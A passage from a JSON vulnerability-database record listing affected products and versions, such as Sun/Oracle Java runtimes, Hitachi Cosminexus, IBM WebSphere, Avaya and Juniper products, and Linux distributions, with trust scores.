03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus primary server base 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus client 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-50" }, { "model": "cosminexus application server enterprise 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "junos space", "scope": "eq", "trust": 0.6, "vendor": "juniper", "version": "15.1" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.30" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cosminexus application server standard 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cosminexus application server enterprise 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus application server 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "cosminexus application server enterprise 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "jrockit r28.3.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "ucosminexus developer (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-00" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.39" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "runtimes for java technology 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.11" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "cosminexus developer professional 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "cosminexus client 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v06" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.110" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus client 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "web sphere real time service refresh", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "36" }, { "model": "cosminexus developer light 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server enterprise 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus developer 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "cosminexus application server enterprise 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cosminexus developer professional 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "cosminexus client 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus studio 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus studio 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.0" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "cosminexus application server 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "cosminexus studio 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "quickfile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.0" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "cosminexus developer professional 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": 